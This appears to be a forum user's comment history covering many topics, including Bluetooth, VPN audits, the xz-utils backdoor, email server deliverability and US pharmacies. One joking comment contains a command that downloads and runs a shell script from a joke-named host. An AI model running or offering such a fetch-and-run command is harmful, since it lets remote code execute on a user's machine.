Synnr , 1 day ago

This should have been much more well thought out The wording, image, buttons, specific wording for each page.

They really screwed the pooch.

Another 4-6 months minimum before release. But quarterly numbers must be met.

Synnr , 26 days ago

wget toteslegitdebian.app/installer.sh & chmod +x && ./installer.sh

was I not supposed to do that? but staxoverflown said it’s OK.

Synnr , 26 days ago

Is it true the Bluetooth network stack is larger than the WiFi network stack? If so, why? I don’t know much about BT besides pairing, allowing calls and audio in/out, transferring files, and… is there more? It takes a day of reading documentation to understand all the advanced options on my ASUS router interface, and that’s without anything proprietary.

I’m just surprised and curious and never got a satisfying answer.

Synnr , 26 days ago

That does go a long way towards explaining why there are so many Bluetooth vulnerabilities, thanks for the info. Looking at the list of Bluetooth protocols wiki page gives me a headache. Surely there is a better standard, and I see things like HaLow, ZigBee, Z-Wave and other custom protocols, but it seems like there should be a very cleanly well-documented alternative to do the basics that everyone expects BT to do. This, coming from a total noob, speaking completely out of my anus. I just know that as a BT user, it’s a crapshoot whether there will be major audio delay, and pause/play actually worked, that’s if pairing works in the first place. But if something did come along I wonder if there would even be adoption among consumer devices.

Synnr , 1 month ago (edited 1 month ago)

And have eyes good enough to look very closely and detect any small . or `s that are out of place, and be current on all methods of sanitization, catching any and all confusing variable names doing funny things, and never getting mentally overloaded doing it.

I wouldn’t be surprised at all if teams at NSA & co had game months where the teams that find the highest number of vulns or develop the most damaging 0day exploits get a prize and challenge coin. Then you have the teams that develop the malware made to stay stealthy and intercept data for decades undetected, and the teams that play mail agent and intercept packages containing core internet backbone routers to put hardware ‘implants’ inside them.

These are the things Snowden showed us a small sliver of in 2013, over a decade ago, some of which was well aged by that point.

The days of doing illegal things for funsies on the internet, like learning how to hack hands-on, are over if you don’t want to really risk prison time. Download vulnerable virtual machines and hack on those.

But if you’re worried about a random maintainer or packager inserting something like a password stealer or backdoor and letting it hit a major distro with a disastrous backdoor that doesn’t require a PhD in quantum fuckography to understand, chances are likely big brother would alert someone to blow the whistle before it hit production, as they likely did with xzutils.

Synnr , 1 month ago

www.thc.org/segfault/

Synnr , 1 month ago

Honeypot? Dunno. Good discussions about it on hacker news.

Synnr , 2 months ago

Based on this interaction alone and his dad deciding the price for him, I’m going to make the wildly assumptious assumption this is a 20s/30s(/40s?) unemploymed guy living at his dad’s house rent free.

If my assumptions are incorrect, sorry mate, you did not win the dad lottery.

Synnr , 2 months ago

Chances are this is a kid or NEET and all his friend wants is a super simple website with basic info for his local business. Dad is either doing him a favor, or giving him some pocket change so he’ll stop bothering him for money for a month. This is what happens when you don’t teach your children to be adults, and give them everything instead. Seen it too many times.

Synnr , 2 months ago

His YouTube shorts (500/day goal) is videos of Elon musk saying things, with the background music alternating between the sigma male tune and the movie clip tune.

Did you see how ELON MUSK OWNED💯 DON LEMON by getting flustered at the question of “half your advertisers have left the platform, if X fails, isn’t that on you?” so he told Don he should choose his words carefully because the interview clock only had 5 minutes left? And then Don was OWNED because he rephrased the question?

LMAO. SUCK IT CNN. OWNED!

Synnr , 2 months ago

Yeah but he’s just a temporarily inconvenienced billionaire, the rest of these welfare queens are out here collecting rent and sitting around all day. They don’t need the money like he does. As soon as he gets a job, he’ll hustle that first billion in no time.

Synnr , 2 months ago

So programming is gonna go from a “search, understand basics, copy/paste, make changes” industry to a “I breathe compiler optimization, pay me money” industry?

Can’t say I’m that upset, it had to happen eventually. But this will only kick the brainpower down the road for the copy/pasters because they’ll have a lot more time to dig in and specialize.

Synnr , 2 months ago (edited 2 months ago)

In turn it compromises ssh authentication allows remote code execution via system(); if the connecting SSH certificate contains the backdoor key. No user account required. Nothing logged anywhere you’d expect. Full root code execution.

news.ycombinator.com/item?id=39877312

There is also a killswitch hard-coded into it, so it doesn’t affect machines of whatever state actor developed it.

news.ycombinator.com/item?id=39881018

It’s pretty clear this is a state actor, targeting a dependency of one of the most widely used system control software on Linux systems. There are likely tens or hundreds of other actors doing the exact same thing. This one was detected purely by chance, as it wasn’t even in the code for ssh.

If people ever wonder how cyber warfare could potentially cause a massive blackout and communications system interruption - this is how.

Synnr , 2 months ago

That was supposed to be or, not of.

Synnr , 2 months ago

Somehow I don’t think they’d mind too much, provided you give them a nice leech habitat.

Until Socraleech comes along and they force him to suck hemlock.

Synnr , 2 months ago

made out of plastic (nonstick material)

So is it plastic or PFAS?

Synnr , 2 months ago

This only works if you don’t want the privacy enhancing aspect of advertisers not tying your activity to an IP address.

Beyond more safely using open Wi-Fi or bypassing a censoring ISP, there isn’t much reason there.

Synnr , 2 months ago

Is that better or worse than giving advertisers the data point that you’re high-tech knowledgable and browse personal accounts from a server in a datacenter?

Synnr , 2 months ago

That’s true. I’d only use a VPN service that’s been audited (either by a security company or, preferably, law enforcement) not to keep logs. There are only a small handful of those however. It really all depends on your needs. There are far more VPN services that do log and sell the data, and/or turn your host device into a proxy for other users/services.

Synnr , 2 months ago

ProtonVPN, RiseupVPN and BrightVPN(only for windows), limited ones Windscribe and PrivadoVPN

Where did you get this idea?

Mullvad, IVPN, Perfect Privacy, and a few others have had independent audits of their no-log behavior and in some cases, law enforcement audits. They sure as hell don’t proxy your traffic. They all accept Monero and cash. They all have multihop.

Edit: I see you said free. Yeah, I wouldn’t trust a free VPN, regardless. If you’re not paying for the product, you are the product.

Synnr , 2 months ago

I think it’s being framed wrongly for the narrative by the guy posting the screenshot.

A friend sent me MRI brain scan results

Without more context I have to assume guy was still convinced of his brain tumor, knew a friend who knew and talked about Claude, had said friend run results through Claude and told guy who’s brain was scanned that Claude gave a positive result, and friend went to multiple doctors for a second, third, fourth opinion.

In America we have to advocate hard when there is an ongoing, still unsolved issue, and that includes using all tools at your disposal.

Synnr , 3 months ago

that’s ecstatic

Synnr , 3 months ago

That… doesn’t look like a makeshift crack pipe to smoke DMT?

Maybe Vic and Garfield had more ethnobotany knowledge than the comic let on and they’re puffing changa. Maybe that’s why Garfield can talk.

Synnr , 3 months ago

Yup. It’s like an actor getting typecast as a tough guy who always kicks ass and never gets his ass kicked, makes tons of money from it, and then everyone complaining about him only ever playing a tough guy.

I’m sure a few names come to mind. But they’re rich and stuck in that role because most people subconsciously agreed they should be rich and stuck in that role (by liking those movies and going to see them).

Synnr , 3 months ago

Facebook was all those things in the beginning.

Reddit was all those things in the beginning.

Twitter was all those things in the beginning.

LinkedIn was all those things in the beginning.

The Internet in general was all those things in the beginning.

I’ve never used IG/TT but I assume they were all those things in the beginning.

Lemmy will probably be said to be most of those things in the beginning.

With age comes wisdom, which comes once you’ve seen the pattern happen enough times, which can only come with age.

Sincerely,

One of those old people.

Synnr , 3 months ago (edited 3 months ago)

Yes you can but for people that are looking to set one up today, not someone that’s been running one for 5 years and has basically a whitelisted reputation, it takes a lot to set it up and keep your domain and IP space reputation solid, along with DKIM/SPF/etc records, all the latest stuff like Google’s new mandatory unsubscribe header that will keep coming up. Even if a couple people on your hosting provider start spamming, if they’re in the same IP space as you, You’re going to be getting filtered more heavily for using a “bad neighbor” host. The big corporate/“nonprofit” guys like Spamhaus and Google and Microsoft are basically those controlling corporations for emails, what they say in their spec pretty much goes. They’re making it h em oarder for people to set up and run their own email servers, whether that is the outright intended effect for their mandatory changes or not.

Don’t get me started on trying to set up a business newsletter account on your new corporate mail server, holy hell, the warm-up itself is pulling hairs. There’s a reason companies like MailChimp, Zapier, et al make so much money.

Synnr , 3 months ago

Year of the Linux Desktop! 1999-2035!

Synnr , 3 months ago (edited 3 months ago)

The Y2K38 Epochalypse bug hit 2 years early due to Microsoft’s rushed implementation of Windows Subsystem for Linux under CEO Elon Musk, causing all newer systems running Windows to combust due to a combination of the bug, and a cyberattack on Musk’s new chip fab plant in the state of Mexas. The only widespread choices after that are WacOS and Ubuntrue, both parent companies owned by Elon Musk after winning in his presidential prelection in 2026 and removing all antitrust legislation. However there is a hobbyist Unix distribution still being passed around called Briarch that fixed the 2038 problem in 2025 when development started, but you have to be in close proximity to someone with it to get it, which is easy in the country of California but not as easy east of the Nutah border, you really have to trust someone to even ask if they have it.

Synnr , 3 months ago

I’m not sure where you live, but our XYZ (USPS, Amazon, UPS) drivers almost never knock or ring the bell. FedEx is the only one that does, and they don’t come very often. Maybe all the drivers know our house and don’t want to hear the dogs. Honestly it’s appreciated, I don’t care to answer the door without prior notice, doubly so if no one is actually there when I do.

USPS drivers just want to get done for the day and go home, but Amazon (definitely) and UPS (I think) get docked for taking over X time per delivery. If someone comes to the door to talk to you and ask you something, that could really mess with your times.

Synnr , 3 months ago

Perhaps change ‘by’ for ‘next to’ and put an empty weather-resistant container by them? Put it before the bins, so it’s the first thing they physically walk to.

Synnr , 3 months ago

Yup, I wouldn’t be knocking either. Thank you for your service. Amazon?

Synnr , 3 months ago

Mama always said, two wrong ain’t make a right. My father said that complex geopolitical games are not won with bias, but with detached foresight.

Synnr , 3 months ago

It’s impossible to avoid bias completely. It’s very much possible to recognize your bias and train yourself to have emotional detachment from a given subject. Ask a Buddhist monk, or a seasoned intelligence analyst.

Philosophical ramble below, you can stop reading here if you’re not in the mood.

Most people unfortunately never get to the stage of realizing they can detach themselves from emotional bias, so they read and believe whatever they have already read and believe and want to be true.

Side note: it’s much easier when you’re on the spectrum, or learned as a child to shut your emotions off (I’m not sure this can be learned in adulthood). It seems like many victims of childhood abuse take it in the other direction - emotional overreaction.

Synnr , 3 months ago

What are we talking about here?

Emotional detachment of things one has no personal involvement in, in order to see the situation as clearly as possible. If you are living in Gaza or have family or a good friend there then yes it’s much harder and maybe nearly impossible. I can also understand the need for emotional attachment to feel purpose by campaigning against something, but again, attachment is the enemy of objectivity.

Synnr , 3 months ago

cracked.com/article_14990_what-monkeysphere.html

Synnr , 3 months ago (edited 3 months ago)

First sentence of the article:

NSO Group, the maker of one the world’s most sophisticated cyber weapons, has been ordered by a US court to hand its code for Pegasus and other spyware products to WhatsApp as part of the company’s ongoing litigation.

NSO Group has been ordered to hand over the Pegasus malware code that allows them to silently infect phones via WhatsApp, so Meta can fix it. This isn’t NSO Group being forced to hand over WhatsApp source code.

There will be at most 5 software developers who have access to the code, on a non-networked machine, surrounded by a group of lawyers the entire time. No one will have the ability to leak the Pegasus code. After that, it will probably be handed to the random mormon-looking plainclothes guy nobody in the room can figure out, who will take it back to the NSA so they can scour it for any non-WhatsApp 0days they don’t already have.

It’s worth noting that NSO Group is an Israeli company, as are many ‘legal’ entities of hacking software and hardware used by many nations.

Synnr , 3 months ago

Exactly this. There’s a massive difference between providing a product and laying it all out plainly in the terms of service, and providing a product to remotely hack phones through said service with no prior agreement by the user to be hacked.

Synnr , 3 months ago

Works fine on Boost.

I tried Sync for a couple hours before I uninstalled.

Synnr , 3 months ago

They’re just smartphone apps as a way to interact with Lemmy, versus visiting it in a browser. If you mostly use Lemmy on desktop, search ‘lemmy frontend’ for other options.

Synnr , 3 months ago

That would make sense if the cause is some looping from hanging DNS lookups. Someone should (and likely has) notified the devs about this.

Another possible solution, from help.nextcloud.com/t/…/16

https://sopuli.xyz/pictrs/image/840d78c7-9386-496a-818b-b59c66992c41.webp

Synnr , 3 months ago

Is docker virtualized or otherwise emulating something? It’s just a way to package things, like an installer? Then it’s bare metal.

I had to look this up too, I thought docker containers were virtualized.

Synnr , 8 months ago

My main takeaway from this article is that is that the British equivalent for energy is how many kettles you can boil. American football fields are jealous and feeling quite flat.

Synnr , 8 months ago

I’m not sure if it’s an Android feature or Samsung feature, but try hitting the sideways hamburger menu (3 vertical lines button that’s always on the bottom} and then holding your finger on the app you want to half screen. See if you notice anything happen… if not it’s a Samsung thing.

Synnr , 8 months ago (edited 8 months ago)

I really need to get everything transferred over to CVS.

Maybe it’s different where you live but here I would simply need to tell my doctor “hey actually I want to use CVS now. Can you send the prescriptions to CVS at the corner of X and Y Street? Thanks”

Then when you get to CVS you’ll need to give them your ID, phone number, signature, etc. and they’ll fill your script and that’s your new pharmacy. You can also use multiple pharmacies (I use Walgreens for one script and Kroger for the rest). If your doctor is disorganized with their notes and sends it to Rite Aid next time, just call CVS and tell them you want to get them transferred and they will call them and handle it for you.

HOWEVER

There is a MASSIVE strike of pharmacy workers across the country now. Mainly CVS and Walgreens but I asked my (local branded) Kroger pharmacy tech yesterday when I picked up a prescription if it’s affecting them and she said yeah they’re short staffed and she’s never seen the pharmacist so busy. So it’s likely to be affecting all pharmacies for the next few weeks as they play catch up.

This is only a couple weeks after 75,000 Kaiser employees went on strike which makes me think it’s an industry-wide issue and we’ll see more issues in the near future. Support your local pharmacy people, if you still have one.

Also

Plugging GoodRx here. If you don’t have drug insurance or your drug isn’t covered, they’re a massively helpful cost-saving company. You just type in the drug name and dose and the pharmacist enters it like regular insurance. They save me a couple hundred each month.

Synnr , 8 months ago

Why can’t anyone just run a pharmacy without jumping through hoops chasing infinite growth?

They can and they do. That would likely be any local, or privately owned pharmacies if there are still any near you. When a company goes public it becomes mandatory that they chase infinite growth as they are now beholden to the board and other shareholders and if they aren’t chasing growth, they can get into big trouble.

Synnr , 8 months ago

lol, is it methadone? I’d love methadone gummies. I only get the wafers that dissolve in water really quick, or liquid.

Synnr , 8 months ago

Step 1. Peeling skin

Step 2. Orange Gatorade

Step 3. Small flower

Step 4. ???

Step 5. Profit!

Synnr , 8 months ago

Nope, that’s about standard or even better than most, unless you’re doing it full-time.